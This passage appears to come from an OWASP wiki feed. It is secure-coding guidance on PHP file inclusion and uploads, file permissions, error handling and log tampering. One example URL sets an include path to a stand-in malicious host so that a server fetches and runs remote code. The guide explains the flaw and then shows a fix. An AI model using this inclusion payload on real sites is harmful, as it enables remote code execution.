include($sIncludePath . 'functions.php'); &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// functions.php&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'datetime.php');&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'filesystem.php');&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In the above example, functions.php is not meant to be called directly, so it assumes the calling page sets $sIncludePath. By creating a file called datetime.php or filesystem.php on another server (and turning off PHP processing on that server) we could call functions.php like the following:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
functions.php?sIncludePath=http://www.malicioushost.com/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
PHP would nicely download datetime.php from the other server and execute it, which means a malicious user could execute code of his/her choice in functions.php. I would recommend against includes within includes (as the example above). In my opinion, it makes it harder to understand and get an overview of the code. Right now, we want to make the above code safe and to do that we make sure that functions.php really is called from file.php. The code below shows one solution: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// file.php&lt;br /&gt;
&lt;br /&gt;
define('SECURITY_CHECK', true);&lt;br /&gt;
&lt;br /&gt;
$sIncludePath = '/inc/'; &lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'functions.php'); &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
// functions.php&lt;br /&gt;
&lt;br /&gt;
if ( !defined('SECURITY_CHECK') ) {&lt;br /&gt;
&lt;br /&gt;
// Output error message and exit. 	   &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'datetime.php');&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'filesystem.php'); 	  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The function define() defines a constant. Constants are not prefixed by a dollar sign ($) and thus we cannot break this by something like: functions.php?SECURITY_CHECK=1. Although not so common these days, you can still come across PHP files with the .inc extension. These files are only meant to be included by other files. What is often overlooked is that these files, if called directly, do not go through the PHP preprocessor, and thus are sent in clear text. We should be consistent and stick with one extension that we know is processed by PHP. The .php extension is recommended.&lt;br /&gt;
&lt;br /&gt;
==File upload  ==&lt;br /&gt;
&lt;br /&gt;
PHP is a feature rich language and one of it is built in features is automatic handling of file uploads. When a file is uploaded to a PHP page, it is automatically saved to a temporary directory. New global variables describing the uploaded file will be available within the page. Consider the following HTML code presenting a user with an upload form: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;form action= “page.php “ method= “POST “ enctype= “multipart/form-data “&amp;gt; 	  &amp;lt;input type= “file “ name= “testfile “ /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type= “submit “ value= “Upload file “ /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/form&amp;gt; 	  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After submitting the above form, new variables will be available to page.php based on the “testfile” name. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// Variables set by PHP and what they will contain: &lt;br /&gt;
&lt;br /&gt;
// A temporary path/filename generated by PHP. This is where the file is&lt;br /&gt;
&lt;br /&gt;
// saved until we move it or it is removed by PHP if we choose not to do anything with it. &lt;br /&gt;
&lt;br /&gt;
$testfile &lt;br /&gt;
&lt;br /&gt;
// The original name/path of the file on the client's system. &lt;br /&gt;
&lt;br /&gt;
$testfile_name&lt;br /&gt;
&lt;br /&gt;
// The size of the uploaded file in bytes. 	&lt;br /&gt;
&lt;br /&gt;
$testfile_size &lt;br /&gt;
&lt;br /&gt;
// The mime type of the file if the browser provided this information. For example:  “image/jpeg”. 	&lt;br /&gt;
&lt;br /&gt;
$testfile_type 	  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A common approach is to check if $testfile is set and if it is, start working on it right away, maybe copying it to a public directory, accessible from any browser. You probably already guessed it; this is a very insecure way of working with uploaded files. The $testfile variable does not have to be a path/file to an uploaded file. It could come from GET, POST, and COOKIE etc. A malicious user could make us work on any file on the server, which is not very pleasant. We should not assume anything about the register_globals directive, it could be on or off for all we care, our code should work with or without it and most importantly it will be just as secure regardless of configuration settings. So the first thing we should do is to use the $_FILES array:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// The temporary filename generated by PHP &lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['tmp_name'] &lt;br /&gt;
&lt;br /&gt;
// The original name/path of the file on the client's system. $_FILES['testfile']['name'] &lt;br /&gt;
&lt;br /&gt;
// The mime type of the file if the browser provided this information. &lt;br /&gt;
&lt;br /&gt;
// For example:  “image/jpeg “. 	&lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['type']&lt;br /&gt;
&lt;br /&gt;
// The size of the uploaded file in bytes.&lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['size'] 	 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The built in functions is_uploaded_file() and/or move_uploaded_file() should be called with $_FILES['testfile']['tmp_name'] to make sure that the file really was uploaded by HTTP POST. The following example shows a straightforward way of working with uploaded files: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
if ( is_uploaded_file($_FILES['testfile']['tmp_name']) ) {&lt;br /&gt;
&lt;br /&gt;
// Check if the file size is what we expect (optional) &lt;br /&gt;
&lt;br /&gt;
if ( $_FILES['sImageData']['size'] &amp;gt; 102400 ) {&lt;br /&gt;
&lt;br /&gt;
// The size can not be over 100kB, output error message and exit. 	        ...&lt;br /&gt;
&lt;br /&gt;
}    &lt;br /&gt;
&lt;br /&gt;
// Validate the file name and extension based on the original name in $_FILES['testfile']['name'], &lt;br /&gt;
&lt;br /&gt;
// we do not want anyone to be able to upload .php files for example. 	   ...&lt;br /&gt;
&lt;br /&gt;
// Everything is okay so far, move the file with move_uploaded_file 	  &lt;br /&gt;
&lt;br /&gt;
... &lt;br /&gt;
&lt;br /&gt;
} 	&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Note: We should always check if a variable in the superglobals arrays is set with isset() before accessing it. I choose not to do that in the above examples because I wanted to keep them as simple as possible.&lt;br /&gt;
&lt;br /&gt;
==Old, unreferenced files ==&lt;br /&gt;
&lt;br /&gt;
It is common for system administrators and developers to use editors and other tools which create temporary old files. If the file extensions or access control permissions change, an attacker may be able to read source or configuration data.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Check the file system for:&lt;br /&gt;
&lt;br /&gt;
* Temporary files (such as core, ~foo, blah.tmp, and so on) created by editors or crashed programs&lt;br /&gt;
&lt;br /&gt;
* Folders called “backup” “old” or “Copy of …”&lt;br /&gt;
&lt;br /&gt;
* Files with additional extensions, such as foo.php.old&lt;br /&gt;
&lt;br /&gt;
* Temporary folders with intermediate results or cache templates&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use source code control to prevent the need to keep old copies of files around&lt;br /&gt;
&lt;br /&gt;
* Periodically ensure that all files in the web root are actually required&lt;br /&gt;
&lt;br /&gt;
* Ensure that the application’s temporary files are not accessible from the web root&lt;br /&gt;
&lt;br /&gt;
==Second Order Injection ==&lt;br /&gt;
&lt;br /&gt;
If the web application creates a file that is operated on by another process, typically a batch or scheduled process, the second process may be vulnerable to attack. It is a rare application that ensures input to background processes is validated prior to first use.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Does the application use background / batch / scheduled processes to work on user supplied data?&lt;br /&gt;
&lt;br /&gt;
* Does this program validate the user input prior to operating on it?&lt;br /&gt;
&lt;br /&gt;
* Does this program communicate with other business significant processes or otherwise approve transactions? &lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Ensure that all behind the scenes programs check user input prior to operating on it&lt;br /&gt;
&lt;br /&gt;
* Run the application with the least privilege – in particular, the batch application should not require write privileges to any front end files, the network, or similar&lt;br /&gt;
&lt;br /&gt;
* Use inbuilt language or operating system features to curtail the resources and features which the background application may use. For example, batch programs rarely if ever require network access. &lt;br /&gt;
&lt;br /&gt;
* Consider the use of host based intrusion detection systems and anti-virus systems to detect unauthorized file creation. &lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Klein, A., ''Insecure Indexing''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.webappsec.org/projects/articles/022805-clean.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* MySQL world readable log files&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/advisories/3803&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Oracle 8i and 9i Servlet allows remote file viewing&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://online.securityfocus.com/advisories/3964&amp;lt;/u&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
==File System ==&lt;br /&gt;
&lt;br /&gt;
Even with an authentication system in place to protect your content, if file permissions are set incorrectly an attacker could browse directly to your application source code or protected documents.  The section below gives guidance in setting file system permissions and directories to reduce your risk of exposure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''File Permissions'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Restrict access of the \CFIDE directory to specific IP address and user group/account.&lt;br /&gt;
&lt;br /&gt;
Remove the \cfdocs directory. Sample applications are installed by default in the cfdocs directory and are accessible to anyone. These applications should never be available on a production server.&lt;br /&gt;
&lt;br /&gt;
Ensure that directory browsing is disabled.&lt;br /&gt;
&lt;br /&gt;
Ensure that proper access controls are set on web application content. The following settings assume a user account called “cfuser” has been created to run the ColdFusion service.  In addition, if you are using a directory or operating system authentication service these setting may need to be adjusted.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
File types: Scripts (.cfm, .cfml, .cfc, .jsp, and others)&lt;br /&gt;
&lt;br /&gt;
'''ACLs: cfuser (Execute); Administrators (Full)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
File types: Static content (.txt, .gif, .jpg, .html, .xml)&lt;br /&gt;
&lt;br /&gt;
'''ACLs: cfuser (Read); Administrators (Full)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''File Upload'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Upload files to a destination outside of the web application directory.&lt;br /&gt;
&lt;br /&gt;
Enable virus scan on the destination directory.&lt;br /&gt;
&lt;br /&gt;
Do not allow user input to specify the destination directory or file name of uploaded documents.&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:File System]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Error_Handling,_Auditing_and_Logging&amp;diff=59849</id>
		<title>Error Handling, Auditing and Logging</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Error_Handling,_Auditing_and_Logging&amp;diff=59849"/>
				<updated>2009-05-02T11:04:08Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Error Handling and Logging */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
Many industries are required by legal and regulatory requirements to be:&lt;br /&gt;
&lt;br /&gt;
* Auditable – all activities that affect user state or balances are formally tracked&lt;br /&gt;
&lt;br /&gt;
* Traceable – it’s possible to determine where an activity occurs in all tiers of the application&lt;br /&gt;
&lt;br /&gt;
* High integrity – logs cannot be overwritten or tampered with by local or remote users&lt;br /&gt;
&lt;br /&gt;
Well-written applications will dual-purpose logs and activity traces for audit and monitoring, and make it easy to track a transaction without excessive effort or access to the system. They should possess the ability to easily track or identify potential fraud or anomalies end-to-end.&lt;br /&gt;
&lt;br /&gt;
==Environments Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data – All sections should be reviewed, but in particular:&lt;br /&gt;
&lt;br /&gt;
DS11.4 Source data error handling&lt;br /&gt;
&lt;br /&gt;
DS11.8 Data input error handling&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Error handling, debug messages, auditing and logging are different aspects of the same topic: how to track events within an application:&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
==Best practices ==&lt;br /&gt;
&lt;br /&gt;
* Fail safe – do not fail open&lt;br /&gt;
&lt;br /&gt;
* Dual purpose logs&lt;br /&gt;
&lt;br /&gt;
* Audit logs are legally protected – protect them&lt;br /&gt;
&lt;br /&gt;
* Reports and search logs using a read-only copy or complete replica &lt;br /&gt;
&lt;br /&gt;
==Error Handling ==&lt;br /&gt;
&lt;br /&gt;
Error handling takes two forms: structured exception handling and functional error checking. Structured exception handling is always preferred as it is easier to cover 100% of code. Functional languages, such as PHP 4, that do not have exceptions are very hard to cover 100% of all errors. Code that covers 100% of errors is extraordinarily verbose and difficult to read, and can contain subtle bugs and errors in the error handling code itself.&lt;br /&gt;
&lt;br /&gt;
Motivated attackers like to see error messages as they might leak information that leads to further attacks, or may leak privacy related information. Web application error handling is rarely robust enough to survive a penetration test. &lt;br /&gt;
&lt;br /&gt;
Applications should always fail safe. If an application fails to an unknown state, it is likely that an attacker may be able to exploit this indeterminate state to access unauthorized functionality, or worse create, modify or destroy data.&lt;br /&gt;
&lt;br /&gt;
===Fail safe ===&lt;br /&gt;
&lt;br /&gt;
* Inspect the application’s fatal error handler.&lt;br /&gt;
&lt;br /&gt;
* Does it fail safe? If so, how?&lt;br /&gt;
&lt;br /&gt;
* Is the fatal error handler called frequently enough?&lt;br /&gt;
&lt;br /&gt;
* What happens to in-flight transactions and ephemeral data?&lt;br /&gt;
&lt;br /&gt;
===Debug errors ===&lt;br /&gt;
&lt;br /&gt;
* Does production code contain debug error handlers or messages?  &lt;br /&gt;
&lt;br /&gt;
* If the language is a scripting language without effective pre-processing or compilation, can the debug flag be turned on in the browser?&lt;br /&gt;
&lt;br /&gt;
* Do the debug messages leak privacy related information, or information that may lead to further successful attack?&lt;br /&gt;
&lt;br /&gt;
===Exception handling ===&lt;br /&gt;
&lt;br /&gt;
* Does the code use structured exception handlers (try {} catch {} etc) or function-based error handling? &lt;br /&gt;
&lt;br /&gt;
* If the code uses function-based error handling, does it check every return value and handle the error appropriately?&lt;br /&gt;
&lt;br /&gt;
* Would fuzz injection against the average interface fail? &lt;br /&gt;
&lt;br /&gt;
===Functional return values ===&lt;br /&gt;
&lt;br /&gt;
Many languages indicate an error condition by return value. E.g.:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$query = mysql_query(“SELECT * FROM table WHERE id=4”, $conn);&lt;br /&gt;
&lt;br /&gt;
if ( $query === false ) {&lt;br /&gt;
&lt;br /&gt;
		// error&lt;br /&gt;
&lt;br /&gt;
} &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Are all functional errors checked? If not, what can go wrong?&lt;br /&gt;
&lt;br /&gt;
==Detailed error messages ==&lt;br /&gt;
&lt;br /&gt;
Detailed error messages provide attackers with a mountain of useful information.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable  ===&lt;br /&gt;
&lt;br /&gt;
* Are detailed error messages turned on? &lt;br /&gt;
&lt;br /&gt;
* Do the detailed error messages leak information that may be used to stage a further attack, or leak privacy related information? &lt;br /&gt;
&lt;br /&gt;
* Does the browser cache the error message?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Ensure that your application has a “safe mode” to which it can return if something truly unexpected occurs. If all else fails, log the user out and close the browser window.&lt;br /&gt;
&lt;br /&gt;
Production code should not be capable of producing debug messages. If it does, debug mode should be triggered by editing a file or configuration option on the server. In particular, debug should not enabled be an option in the application itself.&lt;br /&gt;
&lt;br /&gt;
If the framework or language has a structured exception handler (i.e. try {} catch {}), it should be used in preference to functional error handling.&lt;br /&gt;
&lt;br /&gt;
If the application uses functional error handling, its use must be comprehensive and thorough.&lt;br /&gt;
&lt;br /&gt;
Detailed error messages, such as stack traces or leaking privacy related information, should never be presented to the user. Instead a generic error message should be used. This includes HTTP status response codes (i.e. 404 or 500 Internal Server error).&lt;br /&gt;
&lt;br /&gt;
==Logging ==&lt;br /&gt;
&lt;br /&gt;
===Where to log to? ===&lt;br /&gt;
&lt;br /&gt;
Logs should be written so that the log file attributes are such that only new information can be written (older records cannot be rewritten or deleted). For added security, logs should also be written to a write once / read many device such as a CD-R.&lt;br /&gt;
&lt;br /&gt;
Copies of log files should be made at regular intervals depending on volume and size (daily, weekly, monthly, etc.).  A common naming convention should be adopted with regards to logs, making them easier to index. Verification that logging is still actively working is overlooked surprisingly often, and can be accomplished via a simple cron job!&lt;br /&gt;
&lt;br /&gt;
Make sure data is not overwritten.&lt;br /&gt;
&lt;br /&gt;
Log files should be copied and moved to permanent storage and incorporated into the organization's overall backup strategy.&lt;br /&gt;
&lt;br /&gt;
Log files and media should be deleted and disposed of properly and incorporated into an organization's shredding or secure media disposal plan. Reports should be generated on a regular basis, including error reporting and anomaly detection trending.&lt;br /&gt;
&lt;br /&gt;
Be sure to keep logs safe and confidential even when backed up.&lt;br /&gt;
&lt;br /&gt;
===Handling ===&lt;br /&gt;
&lt;br /&gt;
Logs can be fed into real time intrusion detection and performance and system monitoring tools. All logging components should be synced with a timeserver so that all logging can be consolidated effectively without latency errors. This time server should be hardened and should not provide any other services to the network.&lt;br /&gt;
&lt;br /&gt;
No manipulation, no deletion while analyzing.&lt;br /&gt;
&lt;br /&gt;
===General Debugging ===&lt;br /&gt;
&lt;br /&gt;
Logs are useful in reconstructing events after a problem has occurred, security related or not. Event reconstruction can allow a security administrator to determine the full extent of an intruder's activities and expedite the recovery process.&lt;br /&gt;
&lt;br /&gt;
===Forensics evidence ===&lt;br /&gt;
&lt;br /&gt;
Logs may in some cases be needed in legal proceedings to prove wrongdoing. In this case, the actual handling of the log data is crucial.&lt;br /&gt;
&lt;br /&gt;
===Attack detection ===&lt;br /&gt;
&lt;br /&gt;
Logs are often the only record that suspicious behavior is taking place: Therefore logs can sometimes be fed real-time directly into intrusion detection systems.&lt;br /&gt;
&lt;br /&gt;
===Quality of service ===&lt;br /&gt;
&lt;br /&gt;
Repetitive polls can be protocol led so that network outages or server shutdowns get protocolled and the behavior can either be analyzed later on or a responsible person can take immediate actions.&lt;br /&gt;
&lt;br /&gt;
===Proof of validity ===&lt;br /&gt;
&lt;br /&gt;
Application developers sometimes write logs to prove to customers that their applications are behaving as expected.&lt;br /&gt;
&lt;br /&gt;
* Required by law or corporate policies.&lt;br /&gt;
&lt;br /&gt;
* Logs can provide individual accountability in the web application system universe by tracking a user's actions.&lt;br /&gt;
&lt;br /&gt;
It can be corporate policy or local law to be required to (for example) save header information of all application transactions. These logs must then be kept safe and confidential for six months before they can be deleted.&lt;br /&gt;
&lt;br /&gt;
The points from above show all different motivations and result in different requirements and strategies. This means, that before we can implement a logging mechanism into an application or system, we have to know the requirements and their later usage. If we fail in doing so this can lead to unintentional results.&lt;br /&gt;
&lt;br /&gt;
Failure to enable or design the proper event logging mechanisms in the web application may undermine an organization's ability to detect unauthorized access attempts, and the extent to which these attempts may or may not have succeeded. We will look into the most common attack methods, design and implementation errors, as well as the mitigation strategies later on in this chapter.&lt;br /&gt;
&lt;br /&gt;
There is another reason why the logging mechanism must be planned before implementation. In some countries, laws define what kind of personal information is allowed to be not only logged but also analyzed. For example, in Switzerland, companies are not allowed to log personal information of their employees (like what they do on the internet or what they write in their emails). So if a company wants to log a worker's surfing habits, the corporation needs to inform her of their plans in advance.&lt;br /&gt;
&lt;br /&gt;
This leads to the requirement of having anonymized logs or de-personalized logs with the ability to re-personalized them later on if need be. If an unauthorized person has access to (legally) personalized logs, the corporation is acting unlawful. So there can be a few (not only) legal traps that must be kept in mind.&lt;br /&gt;
&lt;br /&gt;
===Logging types ===&lt;br /&gt;
&lt;br /&gt;
Logs can contain different kinds of data. The selection of the data used is normally affected by the motivation leading to the logging. This section contains information about the different types of logging information and the reasons why we could want to log them.&lt;br /&gt;
&lt;br /&gt;
In general, the logging features include appropriate debugging information such as time of event, initiating process or owner of process, and a detailed description of the event. The following are types of system events that can be logged in an application. It depends on the particular application or system and the needs to decide which of these will be used in the logs:&lt;br /&gt;
&lt;br /&gt;
* Reading of data file access and what kind of data is read. This not only allows to see if data was read but also by whom and when.&lt;br /&gt;
&lt;br /&gt;
* Writing of data logs also where and with what mode (append, replace) data was written. This can be used to see if data was overwritten or if a program is writing at all.&lt;br /&gt;
&lt;br /&gt;
* Modification of any data characteristics, including access control permissions or labels, location in database or file system, or data ownership. Administrators can detect if their configurations were changed.&lt;br /&gt;
&lt;br /&gt;
* Administrative functions and changes in configuration regardless of overlap (account management actions, viewing any user's data, enabling or disabling logging, etc.)&lt;br /&gt;
&lt;br /&gt;
* Miscellaneous debugging information that can be enabled or disabled on the fly.&lt;br /&gt;
&lt;br /&gt;
* All authorization attempts (include time) like success/failure, resource or function being authorized, and the user requesting authorization. We can detect password guessing with these logs. These kinds of logs can be fed into an Intrusion Detection system that will detect anomalies.&lt;br /&gt;
&lt;br /&gt;
* Deletion of any data (object). Sometimes applications are required to have some sort of versioning in which the deletion process can be cancelled.&lt;br /&gt;
&lt;br /&gt;
* Network communications (bind, connect, accept, etc.). With this information an Intrusion Detection system can detect port scanning and brute force attacks.&lt;br /&gt;
&lt;br /&gt;
* All authentication events (logging in, logging out, failed logins, etc.) that allow to detect brute force and guessing attacks too.&lt;br /&gt;
&lt;br /&gt;
==Noise ==&lt;br /&gt;
&lt;br /&gt;
Noise is intentionally invoking security errors to fill an error log with entries (noise) that hide the incriminating evidence of a successful intrusion. When the administrator or log parser application reviews the logs, there is every chance that they will summarize the volume of log entries as a denial of service attempt rather than identifying the 'needle in the haystack'.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
This is difficult since applications usually offer an unimpeded route to functions capable of generating log events. If you can deploy an intelligent device or application component that can shun an attacker after repeated attempts, then that would be beneficial. Failing that, an error log audit tool that can reduce the bulk of the noise, based on repetition of events or originating from the same source for example. It is also useful if the log viewer can display the events in order of severity level, rather than just time based.&lt;br /&gt;
&lt;br /&gt;
==Cover Tracks ==&lt;br /&gt;
&lt;br /&gt;
The top prize in logging mechanism attacks goes to the contender who can delete or manipulate log entries at a granular level, &amp;quot;as though the event never even happened!&amp;quot;. Intrusion and deployment of rootkits allows an attacker to utilize specialized tools that may assist or automate the manipulation of known log files. In most cases, log files may only be manipulated by users with root / administrator privileges, or via approved log manipulation applications. As a general rule, logging mechanisms should aim to prevent manipulation at a granular level since an attacker can hide their tracks for a considerable length of time without being detected. Simple question; if you were being compromised by an attacker, would the intrusion be more obvious if your log file was abnormally large or small, or if it appeared like every other day's log?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Assign log files the highest security protection, providing reassurance that you always have an effective 'black box' recorder if things go wrong. This includes:&lt;br /&gt;
&lt;br /&gt;
*Applications should not run with Administrator, or root-level privileges. This is the main cause of log file manipulation success since super users typically have full file system access. Assume the worst case scenario and suppose your application is exploited. Would there be any other security layers in place to prevent the application's user privileges from manipulating the log file to cover tracks?&lt;br /&gt;
&lt;br /&gt;
*Ensuring that access privileges protecting the log files are restrictive, reducing the majority of operations against the log file to alter and read.&lt;br /&gt;
&lt;br /&gt;
*Ensuring that log files are assigned object names that are not obvious and stored in a safe location of the file system.&lt;br /&gt;
&lt;br /&gt;
*Writing log files using publicly or formally scrutinized techniques in an attempt to reduce the risk associated with reverse engineering or log file manipulation.&lt;br /&gt;
&lt;br /&gt;
*Writing log files to read-only media (where event log integrity is of critical importance).&lt;br /&gt;
&lt;br /&gt;
*Use of hashing technology to create digital fingerprints. The idea is that if an attacker does manipulate the log file, then the digital fingerprint will not match and an alert generated.&lt;br /&gt;
&lt;br /&gt;
*Use of host-based IDS technology where normal behavioral patterns can be 'set in stone'. Attempts by attackers to update the log file through anything but the normal approved flow would generate an exception and the intrusion can be detected and blocked. This is one security control that can safeguard against simplistic administrator attempts at modifications.&lt;br /&gt;
&lt;br /&gt;
==False Alarms ==&lt;br /&gt;
&lt;br /&gt;
Taking cue from the classic 1966 film &amp;quot;How to Steal a Million&amp;quot;, or similarly the fable of Aesop; &amp;quot;The Boy Who Cried Wolf&amp;quot;, be wary of repeated false alarms, since this may represent an attacker's actions in trying to fool the security administrator into thinking that the technology is faulty and not to be trusted until it can be fixed.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Simply be aware of this type of attack, take every security violation seriously, always get to the bottom of the cause event log errors rather, and don't just dismiss errors unless you can be completely sure that you know it to be a technical problem.&lt;br /&gt;
&lt;br /&gt;
===Denial of Service ===&lt;br /&gt;
&lt;br /&gt;
By repeatedly hitting an application with requests that cause log entries, multiply this by ten thousand, and the result is that you have a large log file and a possible headache for the security administrator. Where log files are configured with a fixed allocation size, then once full, all logging will stop and an attacker has effectively denied service to your logging mechanism. Worse still, if there is no maximum log file size, then an attacker has the ability to completely fill the hard drive partition and potentially deny service to the entire system. This is becoming more of a rarity though with the increasing size of today's hard disks.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
The main defense against this type of attack are to increase the maximum log file size to a value that is unlikely to be reached, place the log file on a separate partition to that of the operating system or other critical applications and best of all, try to deploy some kind of system monitoring application that can set a threshold against your log file size and/or activity and issue an alert if an attack of this nature is underway.&lt;br /&gt;
&lt;br /&gt;
==Destruction ==&lt;br /&gt;
&lt;br /&gt;
Following the same scenario as the Denial of Service above, if a log file is configured to cycle round overwriting old entries when full, then an attacker has the potential to do the evil deed and then set a log generation script into action in an attempt to eventually overwrite the incriminating log entries, thus destroying them.&lt;br /&gt;
&lt;br /&gt;
If all else fails, then an attacker may simply choose to cover their tracks by purging all log file entries, assuming they have the privileges to perform such actions. This attack would most likely involve calling the log file management program and issuing the command to clear the log, or it may be easier to simply delete the object which is receiving log event updates (in most cases, this object will be locked by the application). This type of attack does make an intrusion obvious assuming that log files are being regularly monitored, and does have a tendency to cause panic as system administrators and managers realize they have nothing upon which to base an investigation on.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Following most of the techniques suggested above will provide good protection against this attack. Keep in mind two things:&lt;br /&gt;
&lt;br /&gt;
*Administrative users of the system should be well trained in log file management and review. 'Ad-hoc' clearing of log files is never advised and an archive should always be taken. Too many times a log file is cleared, perhaps to assist in a technical problem, erasing the history of events for possible future investigative purposes.&lt;br /&gt;
&lt;br /&gt;
*An empty security log does not necessarily mean that you should pick up the phone and fly the forensics team in. In some cases, security logging is not turned on by default and it is up to you to make sure that it is. Also, make sure it is logging at the right level of detail and benchmark the errors against an established baseline in order measure what is considered 'normal' activity.&lt;br /&gt;
&lt;br /&gt;
==Audit Trails ==&lt;br /&gt;
&lt;br /&gt;
Audit trails are legally protected in many countries, and should be logged into high integrity destinations to prevent casual and motivated tampering and destruction. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Do the logs transit in the clear between the logging host and the destination?&lt;br /&gt;
&lt;br /&gt;
* Do the logs have a HMAC or similar tamper proofing mechanism to prevent change from the time of the logging activity to when it is reviewed?&lt;br /&gt;
&lt;br /&gt;
* Can relevant logs be easily extracted in a legally sound fashion to assist with prosecutions?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Only audit truly important events – you have to keep audit trails for a long time, and debug or informational messages are wasteful&lt;br /&gt;
&lt;br /&gt;
* Log centrally as appropriate and ensure primary audit trails are not kept on vulnerable systems, particularly front end web servers&lt;br /&gt;
&lt;br /&gt;
* Only review copies of the logs, not the actual logs themselves&lt;br /&gt;
&lt;br /&gt;
* Ensure that audit logs are sent to trusted systems&lt;br /&gt;
&lt;br /&gt;
* For highly protected systems, use write-once media or similar to provide trust worthy long term log repositories&lt;br /&gt;
&lt;br /&gt;
